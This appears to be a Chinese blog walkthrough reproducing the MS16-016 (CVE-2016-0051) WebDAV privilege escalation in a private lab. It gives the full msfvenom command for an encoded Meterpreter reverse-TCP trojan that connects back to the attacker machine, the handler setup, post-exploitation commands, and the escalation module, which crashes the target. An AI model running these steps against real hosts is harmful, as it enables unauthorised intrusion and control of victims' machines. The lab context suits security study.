CVE-2016-0051(WebDaV)漏洞复现

MS16-016(WebDaV)漏洞复现
目标机:win7x64 192.168.235.142
攻击机:kali 192.168.235.137
1、 确定目标主机和攻击机能够ping通
在这里插入图片描述
在这里插入图片描述
2、 启动kaliLinux终端利用msfvenom生成后门 输入命令msfvenom -p(-p用来设置参数的) windows/meterpreter/reverse_tcp LHOST=192.168.235.137(LHOST用来设置本地主机ip) LPORT=2222(LPORT=2222用来设置本地监听端口号) -e(-e表示encoder编码) x86/shinkata_ga_nai -i(-I 编码次数) 5 -b(将制定特征进行再编码) ‘x00’ -f(生成文件的格式) exe -o(生成路径及文件名) /root/1.exe
在这里插入图片描述
3、打开win7主机上的winSCP软件用来模仿文件下载
在这里插入图片描述
4、登录192.168.235.137 端口默认22 用来下载文件
在这里插入图片描述
5、已经登录到这个服务器进行文件下载
在这里插入图片描述
将文件1.exe的文件下载到桌面上木马文件已经上传
6、启动msf 终端输入msfconsole
在这里插入图片描述
7、终端中输入use exploit/multi/handler 进入到该模块 show options查看选项
在这里插入图片描述
8、set payload windows/meterpreter/reverse_tcp设置生成木马时 用的payload
在这里插入图片描述
9、show options 设置本地IP 端口 set LHOST 192.168.235.137 set LPORT 2222
在这里插入图片描述
在这里插入图片描述
10、show options 查看配置后的信息
在这里插入图片描述
11、输入run开始监听目标机
在这里插入图片描述
12、双击win7上的1.exe返回kali一个会话
在这里插入图片描述
输入session -l 查看会话id 看到是1 输入session 1
得到meterpreter
在这里插入图片描述
13、输入sysinfo查看目标机信息
在这里插入图片描述
输入getuid 查看当前获取的用户权限
在这里插入图片描述
14、终端中输入ps 看见木马程序1.exe的进程id为 2924
在这里插入图片描述
15、输入migrate 1608尝试将其添加到mysqld 进程中
在这里插入图片描述结果权限不够
16、输入background转入后台.
在这里插入图片描述
17、下面我们进行提权 search ms16 搜索这个相关的模块
并切换到该模块
在这里插入图片描述
在这里插入图片描述
配置会话id
在这里插入图片描述
18、run进行攻击导致蓝屏

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值